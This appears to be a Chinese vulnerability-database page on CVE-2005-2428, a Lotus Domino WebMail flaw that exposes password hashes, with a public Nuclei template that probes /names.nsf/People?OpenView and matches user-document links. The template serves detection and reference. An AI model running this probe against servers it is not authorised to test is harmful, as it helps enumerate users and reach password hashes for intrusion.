CVE-2005-2428: Lotus Domino R5 and R6 WebMail - Information Disclosure

日期: 2025-08-01 | 影响软件: Lotus Domino | POC: 已公开

漏洞描述

Lotus Domino R5 and R6 WebMail with 'Generate HTML for all fields' enabled (which is by default) allows remote attackers to read the HTML source to obtain sensitive information including the password hash in the HTTPPassword field, the password change date in the HTTPPasswordChangeDate field, and the client Lotus Domino release in the ClntBld field (a different vulnerability than CVE-2005-2696).

PoC代码[已公开]

id: CVE-2005-2428

info:
  name: Lotus Domino R5 and R6 WebMail - Information Disclosure
  author: CasperGN
  severity: medium
  description: Lotus Domino R5 and R6 WebMail with 'Generate HTML for all fields' enabled (which is by default) allows remote attackers to read the HTML source to obtain sensitive information including the password hash in the HTTPPassword field, the password change date in the HTTPPasswordChangeDate field, and the client Lotus Domino release in the ClntBld field (a different vulnerability than CVE-2005-2696).
  impact: |
    The vulnerability can lead to the disclosure of sensitive information, potentially compromising user privacy and system security.
  remediation: Ensure proper firewalls are in place within your environment to prevent public exposure of the names.nsf database and other sensitive files.
  reference:
    - http://www.cybsec.com/vuln/default_configuration_information_disclosure_lotus_domino.pdf
    - https://www.exploit-db.com/exploits/39495
    - https://nvd.nist.gov/vuln/detail/CVE-2005-2428
    - http://marc.info/?l=bugtraq&m=112240869130356&w=2
    - http://securitytracker.com/id?1014584
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
    cvss-score: 5
    cve-id: CVE-2005-2428
    cwe-id: CWE-200
    epss-score: 0.06321
    epss-percentile: 0.90603
    cpe: cpe:2.3:a:ibm:lotus_domino:5.0:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: ibm
    product: lotus_domino
  tags: cve2005,cve,domino,edb,ibm

http:
  - method: GET
    path:
      - "{{BaseURL}}/names.nsf/People?OpenView"

    matchers-condition: and
    matchers:
      - type: regex
        name: domino-username
        part: body
        regex:
          - '(<a href="/names\.nsf/[0-9a-z\/]+\?OpenDocument)'

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100c28ae75814902fea5aca6a19b20b712eb89f9dd3607a55b326e255c05ec64cfd022016a11a39bc2f92876259dc0bd788e09272e267082302b4aa2f9fc29b82ad5656:922c64590222798bb761d5b6d8e72950

相关漏洞推荐